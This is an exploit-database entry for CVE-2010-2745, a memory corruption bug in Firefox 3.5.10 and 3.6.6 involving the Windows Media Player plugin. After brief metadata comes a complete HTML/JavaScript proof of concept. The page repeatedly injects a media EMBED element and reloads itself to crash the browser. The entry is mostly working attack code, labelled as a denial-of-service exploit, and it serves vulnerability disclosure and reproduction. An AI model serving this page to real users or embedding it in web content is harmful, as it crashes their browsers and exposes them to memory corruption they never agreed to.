Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups

Author: Skylined
type: dos
platform: windows
port: 
date_added: 2010-10-13 
date_updated: 2017-10-13 
verified: 1 
codes: CVE-2010-2745;OSVDB-68557 
tags: 
aliases:  
screenshot_url:  
application_url: 

Source: http://code.google.com/p/skylined/issues/detail?id=21

# Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups
# Date: 2010-10-13
# Author: berendjanwever
# Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11
# Tested on: Windows XP sp3

<HTML>
  <HEAD>
    <SCRIPT>
      function go() {
        var oWMP = document.getElementById("WMP");
        if (oWMP) {
          location.reload();
        } else {
          var oWrapper = document.getElementById("wrapper");
          oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="repro-firefox.html"></EMBED>';
          setTimeout(go, 1000);
        }
      }
    </SCRIPT>
  </HEAD>
  <BODY onload="go()">
    <SPAN id="wrapper"></SPAN>
  </BODY>
</HTML>